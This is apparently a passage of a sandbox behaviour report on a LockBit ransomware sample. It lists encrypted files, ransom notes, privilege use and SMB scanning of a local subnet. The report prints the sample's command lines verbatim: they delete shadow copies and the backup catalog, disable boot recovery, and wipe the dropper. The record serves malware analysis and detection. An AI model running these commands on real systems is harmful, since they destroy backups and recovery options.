File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages.properties.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaSansDemiBold.ttf.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\ARROW.WAV.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xalan.md.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-80.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALN.TTF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnscfg.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1180 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 1180 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 4952 wrote to memory of 4456 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4952 wrote to memory of 4456 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4952 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4952 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4952 wrote to memory of 2704 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 2704 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4952 wrote to memory of 3244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4952 wrote to memory of 3244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 5692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 760 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 193.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.186:135 tcp
